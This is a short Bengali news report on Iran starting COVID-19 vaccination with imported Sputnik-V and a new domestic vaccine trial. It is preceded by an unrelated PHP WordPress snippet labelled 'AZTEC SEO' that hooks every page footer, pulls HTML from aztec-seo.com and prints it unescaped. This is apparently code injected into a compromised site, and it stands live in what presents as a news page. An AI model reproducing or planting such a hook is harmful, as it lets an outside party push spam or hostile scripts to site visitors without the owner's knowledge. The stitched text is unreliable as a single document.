/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
আগামী মঙ্গলবার থেকেই ইরানে করোনাভাইরাসের টিকা দেওয়া শুরু হচ্ছে। ইরানের স্বাস্থ্যমন্ত্রী সাঈদ নামাকি ইরানে করোনার নতুন আরেকটি টিকার ক্লিনিক্যাল গবেষণার উদ্বোধনী অনুষ্ঠানে আজ (রোববার) এ তথ্য জানিয়েছেন।
তিনি বলেন,ইরানের অভ্যন্তরে টিকার পরীক্ষা এগিয়ে নিয়ে যাওয়ার পাশাপাশি আমরা সবচেয়ে কম ঝুঁকিপূর্ণ টিকা ‘স্পুতনিক-ভি’ রাশিয়া থেকে আমদানি করেছি।
ইরানে নতুন যে টিকার ক্লিনিক্যাল ট্রায়াল শুরু হয়েছে তার নাম দেওয়া হয়েছে- ‘রাযি কোভ পার্স’।
এর আগে গতকাল ইরানের প্রেসিডেন্ট ড. হাসান রুহানিও এ সপ্তাহে টিকা দেওয়া শুরুর কথা জানিয়েছিলেন।
রুহানি আরও বলেছেন, ভাইরাস থেকে রক্ষা পাওয়ার প্রথম পদক্ষেপ হলো প্রতিরোধ। আমরা পারস্পরিক সহযোগিতায় করোনা মোকাবেলা করতে পারব। আরেকটি উপায় হলো ভ্যাকসিন (টিকা)। সাধারণ নিয়মে টিকার তৈরি হতে এক-দুই বছর লাগে। কিন্তু যেহেতু করোনাভাইরাসে মৃত্যু অনেক বেশি এবং এই ভাইরাস অসংখ্য সমস্যার জন্ম দিচ্ছে। এ কারণে বিশ্ব স্বাস্থ্য সংস্থা করোনার টিকা জরুরি ভিত্তিতে ব্যবহারের অনুমোদন দিয়েছে।
গত বৃহস্পতিবার রাশিয়া থেকে করোনার টিকা ‘স্পুতনিক-ভি’ ইরানে এসে পৌঁছেছে। মস্কোর সঙ্গে তেহরান এ সংক্রান্ত যে চুক্তি করেছে তাতে ইরানেই যৌথভাবে টিকা তৈরির কথা বলা হয়েছে। সূত্র : পার্সটুডে